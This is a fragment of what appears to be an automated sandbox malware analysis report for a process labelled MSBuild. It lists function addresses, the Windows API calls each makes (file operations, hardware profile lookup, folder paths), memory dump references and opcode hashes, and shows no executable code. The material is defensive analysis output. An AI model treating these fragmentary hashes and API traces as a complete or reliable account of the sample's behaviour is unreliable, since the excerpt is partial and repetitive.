                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrcat$FileH_prologwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                          • String ID:
                                                                                          • API String ID: 3101948222-0
                                                                                          • Opcode ID: 6a69f1f2ed3b177ebeb85c1869a8abb099c5e14ffe340268730b21adc0a832aa
                                                                                          • Instruction ID: 6e5b766fc683c4e74d5122aabce2b8c3392ef196e7b74699665c3906b53d7570
                                                                                          • Opcode Fuzzy Hash: 6a69f1f2ed3b177ebeb85c1869a8abb099c5e14ffe340268730b21adc0a832aa
                                                                                          • Instruction Fuzzy Hash: 5A41AD7194022DABCF10EBF0EC13DED7B79AB18314F00466AF844A2192E77997958B96
                                                                                          Function 00411250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SHFileOperationA.SHELL32(?), ref: 00411289
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileOperation
                                                                                          • String ID: ^qA
                                                                                          • API String ID: 3080627654-2929517337
                                                                                          • Opcode ID: 16d3a2ce8468c8175a4b0748f848a8e721ac03b0a06bcb47fc2447d8941ceac4
                                                                                          • Instruction ID: 1eaf247a329aa75c86d9425b1c51e37de0b4722cea675766f58cecf8dc0fcae1
                                                                                          • Opcode Fuzzy Hash: 16d3a2ce8468c8175a4b0748f848a8e721ac03b0a06bcb47fc2447d8941ceac4
                                                                                          • Instruction Fuzzy Hash: 68E075B0E0421D9FCB44EFA4D5466EEBBF8FF48308F40806AD919F7240E7B456458BA9
                                                                                          Function 004104A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentProfile
                                                                                          • String ID: Unknown
                                                                                          • API String ID: 2104809126-1654365787
                                                                                          • Opcode ID: 36caf4ab5cc3db7ce453f452f44e3bfd2793be26340c29108ddef0f291e38d6b
                                                                                          • Instruction ID: 7df7fbcbbed776e4458085ee5b54356bf3053a549426d159850edd6d89fd8832
                                                                                          • Opcode Fuzzy Hash: 36caf4ab5cc3db7ce453f452f44e3bfd2793be26340c29108ddef0f291e38d6b
                                                                                          • Instruction Fuzzy Hash: D6E0C270A0010DFBDB10EBA4DA85FDD37BC6B04348F508125A601E3180DBBCE648CBA9
                                                                                          Function 0040D3FA Relevance: 1.7, APIs: 1, Instructions: 221COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                            • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 2625060131-0
                                                                                          • Opcode ID: 376a3a712f82bb87cd6dc28791a904098dcfe9595fc6229afb21645f8f31d16a
                                                                                          • Instruction ID: c334b669d827ce9460b6e052bb784494c4e07a697f8de2f8e66076f210601346
                                                                                          • Opcode Fuzzy Hash: 376a3a712f82bb87cd6dc28791a904098dcfe9595fc6229afb21645f8f31d16a
                                                                                          • Instruction Fuzzy Hash: 63915F71D0024CEACF11EBE5D952BDEBBB8AF14308F10417EE44573282DA78570C8B66